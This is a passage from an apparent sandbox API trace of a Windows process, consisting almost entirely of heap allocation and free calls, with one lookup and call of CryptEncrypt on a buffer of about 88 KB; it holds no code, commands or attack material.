(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ba8 [0137.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.084] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54120 [0137.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0137.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0137.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0137.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0137.085] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ea5cc8*, pdwDataLen=0x8cef60*=0x15985, dwBufLen=0x15988 | out: pbData=0x2ea5cc8*, pdwDataLen=0x8cef60*=0x15988) returned 1 [0137.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0137.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0137.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0137.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0137.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0137.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0137.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0137.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0137.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0137.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0137.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0137.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0137.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0137.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0137.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0137.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0137.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0137.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0137.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0137.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0137.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15988) returned 0x2ebb658 [0137.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0137.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0137.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: 